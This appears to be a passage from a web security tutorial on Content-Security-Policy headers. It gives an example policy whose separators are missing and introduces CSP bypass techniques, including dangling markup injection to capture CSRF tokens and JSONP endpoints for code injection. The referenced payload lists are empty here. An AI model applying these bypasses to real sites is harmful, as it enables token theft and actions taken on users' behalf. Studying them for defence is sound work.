<meta> html tag. It is mainly used to protect against Cross Site Scripting (XSS), Click Jacking attacks and Code Injection attacks.
The Content-Security-Policy if made up of directives, separated with a semicolon
;. Here is an example :
content-security-policy :default-src 'none'frame-ancestors 'none'img-src 'self'script-src github.githubassets.comstyle-src 'unsafe-inline'
You can find the detail of these directives as well as their browser compatibilities here : https://content-security-policy.com/
There is a few techniques to bypass content security policies :
Dangling markup injection is a technique that can be used to capture data cross-domain in situations where a full Cross Site Scripting (XSS) exploit is not possible, due to input filters or other defenses. It can often be exploited to capture sensitive information that is visible to other users, including CSRF tokens that can be used to perform unauthorized actions on behalf of the user.
A lot of useful payloads can be found here :
Here is a list of various JSONP endpoints that can be used to perform code injections :